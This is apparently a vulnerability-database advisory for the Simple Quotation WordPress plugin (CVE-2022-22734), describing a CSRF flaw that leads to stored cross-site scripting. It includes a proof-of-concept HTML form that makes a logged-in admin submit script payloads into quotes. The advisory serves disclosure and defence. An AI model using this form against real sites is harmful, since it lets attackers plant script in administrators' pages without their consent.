WordPress Plugin Vulnerabilities

Simple Quotation <= 1.3.2 - Quote Creation/Edition via CSRF to Stored Cross-Site Scripting

Description

The plugin does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=simple-quotation/simple-quotation.php" method="POST">
      <input type="hidden" name="author" value="<script>alert(/XSS-image/)</script>" />
      <input type="hidden" name="newquotes" value="<script>alert(/XSS-quote/)</script>" />
      <input type="hidden" name="add" value="Add the quote" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
simple-quotation
No known fix

References

CVE
CVE-2022-22734

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Abhishek Bhoir
Submitter
Abhishek Bhoir
Verified
Yes
WPVDB ID
f6e15a23-8f8c-47c2-8227-e277856d8251

Timeline

Publicly Published
2022-02-16 (about 2 years ago)
Added
2022-02-16 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2014-12-18
Title
Twitter Liveblog <= 1.1.2 - Multiple CSRF
Published
2024-03-04
Title
CM Download and File Manager < 2.9.1 - Download Edit via CSRF
Published
2024-04-10
Title
MihanPanel < 12.7 - Cross-Site Request Forgery
Published
2023-04-19
Title
GDPR Compliance & Cookie Consent < 1.3 - CSRF
Published
2014-08-01
Title
Cool Video Gallery 1.8 - admin/video-sitemap.php XML Video Sitemap Generation CSRF